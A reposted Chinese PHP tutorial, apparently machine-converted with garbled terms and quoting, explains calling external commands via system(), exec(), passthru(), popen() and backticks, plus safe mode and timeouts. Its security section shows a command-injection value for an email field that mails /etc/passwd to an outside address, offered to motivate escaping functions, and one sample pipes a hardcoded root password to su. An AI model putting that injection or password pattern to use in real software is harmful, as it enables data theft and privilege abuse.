php 無法執行外部命令 如何調用外部命令

來源:互聯網
上載者:User

調用外部命令的函數有很多

system()
passthru()
escapeshellcmd()
pcntl_exec()
exec()

關於他們的使用我不過度闡述了

然而有時候會遇到這樣的情況

當我們在php指令碼中添加了這樣的命令

例:

exec("rm -rf /a/b/c/*.html");的時候

始終不能執行

問題一:

我碰到過2此了,問題在於c檔案的許可權,設定的高了就可以了

問題二:

PHP 的  平安模式

PHP 指令碼中受到如下四個方面的限制: 由於 PHP 基本是用於 WEB 順序開發的所以平安性成了人們考慮的一個重要方面。

於是PHP 設計者們給 PHP
加了一個門:平安模式。如果運行在平安模式下。 執行外部命令 ;開啟檔案時有些限制;串連 MySQL 資料庫;基於 HTTP 認證。

只有在特定目錄中的外部順序才可以被執行,平安模式下。對其它順序的調用將被拒絕。這個目錄可以在 php.ini 檔案中用
safe_mode_exec_dir 指令,或在編譯 PHP 加上 --with-exec-dir 選項來指定,預設是
/usr/local/php/bin

那麼很可能你網管已經把 PHP 運行在平安模式下了 如果你調用一個應該可以輸出結果的外部命令(意思是 PHP 指令碼沒有錯誤)得到卻是一片空白。

如何做?

可以用如下三種方法來實現: PHP 中調用外部命令。

1 用 PHP 提供的專門函數

PHP 提供共了 3 個專門的執行外部命令的函數: system(),exec(),passthru()。

system()

原型:string system (string command [, int return_var])

執行給定的命令, system 函數很其它語言中的差不多。輸出和返回結果。第二個參數是可選的用來得到命令執行後的狀態代碼。

例子:
  
  〈?
  
  exec(""/bin/ls -l"");
  
  exec(""/bin/ls
-l"", $res);
  
  #$res是一個資料,每個元素代表結果的一行
  
  exec(""/bin/ls -l"",
$res, $rc);
  
  #$rc的值是命令/bin/ls
-l的狀態代碼。成功的情況下通常是0
  
  ?〉
  
  passthru()
  
  原型:void
passthru (string command [, int
return_var])
  
  passthru()只調用命令,不返回任何結果,但把命令的運行結果原樣地直接輸出到標準輸出裝置上。所以passthru()函數經常用來調用象pbmplus(Unix下的一個處理圖片的工具,輸出二進位的原始圖片的流)這樣的程式。同樣它也可以得到命令執行的狀態代碼。
  
  例子:
  
  〈?
  
  header(""Content-type:
image/gif"");
  
  passthru(""./ppmtogif
hunte.ppm"");
  
  ?〉
  
  2)
用popen()函數開啟進程
  
  上面的方法只能簡單地執行命令,卻不能與命令互動。但有些時候必須向命令輸入一些東西,如在增加Linux的系統使用者時,要調用su來把目前使用者換到root才行,而su命令必須要在命令列上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。
  
  popen()函數開啟一個進程管道來執行給定的命令,返回一個檔案控制代碼。既然返回的是一個檔案控制代碼,那麼就可以對它讀和寫了。在PHP3中,對這種控制代碼只能做單一的操作模式,要麼寫,要麼讀;從PHP4開始,可以同時讀和寫了。除非這個控制代碼是以一種模式(讀或寫)開啟的,否則必須調用pclose()函數來關閉它。
  
  例子1:
  
  〈?
  
  $fp=popen(""/bin/ls
-l"",
""r"");
  
  ?〉
  
  例子2(本例來自PHP中國聯盟網站http://www.phpx.com/show.php?d=col&i=51):
  
  〈?
  
  /*
PHP中如何增加一個系統使用者
  
  下面是一段常式,增加一個名字為james的使用者,
  
  root密碼是
verygood。僅供參考
  
  */
  
  $sucommand = ""su --login root
--command"";
  
  $useradd = ""useradd "";
  
  $rootpasswd =
""verygood"";
  
  $user = ""james"";
  
  $user_add = sprintf(""%s
""%s %s"""",$sucommand,$useradd,$user);
  
  $fp =
@popen($user_add,""w"");
  
  @fputs($fp,$rootpasswd);
  
  @pclose($fp);
  
  ?〉
  
  3)
用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)
  
  這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇號把要執行的命令括起來作為一個運算式,這個運算式的值就是命令執行的結果。如:
  
  〈?
  
  $res=`/bin/ls
-l`;
  
  echo
'〈b〉〈pre〉'.$res.'〈/pre〉〈/b〉';
  
  ?〉
  
  這個指令碼的輸出就象:
  
  hunte.gif
  
  hunte.ppm
  
  jpg.htm
  
  jpg.jpg
  
  passthru.php
  
  要考慮些什嗎?
  
  要考慮兩個問題:安全性和逾時。
  
  先看安全性。比如,你有一家小型的網上商店,所以可以出售的產品列表放在一個檔案中。你編寫了一個有表單的HTML檔案,讓你的使用者輸入他們的EMAIL地址,然後把這個產品列表發給他們。假設你沒有使用PHP的mail()函數(或者從未聽說過),你就調用Linux/Unix系統的mail程式來發送這個檔案。程式就象這樣:
  
  〈?
  
  system(""mail
$to 〈 products.txt"");
  
  echo
""我們的產品目錄已經發送到你的信箱:$to"";
  
  ?〉
  
  用這段代碼,一般的使用者不會產生什麼危險,但實際上存在著非常大的安全性漏洞。如果有個惡意的使用者輸入了這樣一個EMAIL地址:

 '--bla mail someone@domain.com 〈 /etc/passwd
'
  
  那麼這條命令最終變成:
  
  'mail --bla mail someone@domain.com 〈
/etc/passwd 〈 products.txt'
  
  我相信,無論哪個網路管理員見到這樣的命令,都會嚇出一身冷汗來。

幸好,PHP為我們提供了兩個函數:EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字串中所有可能瞞過Shell而去執行另外一個命令的字元轉義。這些字元在Shell中是有特殊含義的,象分號(),重新導向(〉)和從檔案讀入(〈)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字串兩邊加上單引號,並把字串中的單引號轉義,這樣這個字串就可以安全地作為命令的參數。
  
  還有逾時問題。如果要執行的命令會花費很長的時間,則應該把這個命令放到系統的後台去運行。但在預設情況下,象system()等函數要等到這個命令運行完才返回(實際上是要等命令的輸出結果),這肯定會引起PHP指令碼的逾時。解決的辦法就是把命令的輸出重新導向到另外一個檔案或流中,例如:
  
  〈?
  system(""/usr/local/bin/order_proc
〉 /tmp/null &"");
  ?〉

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.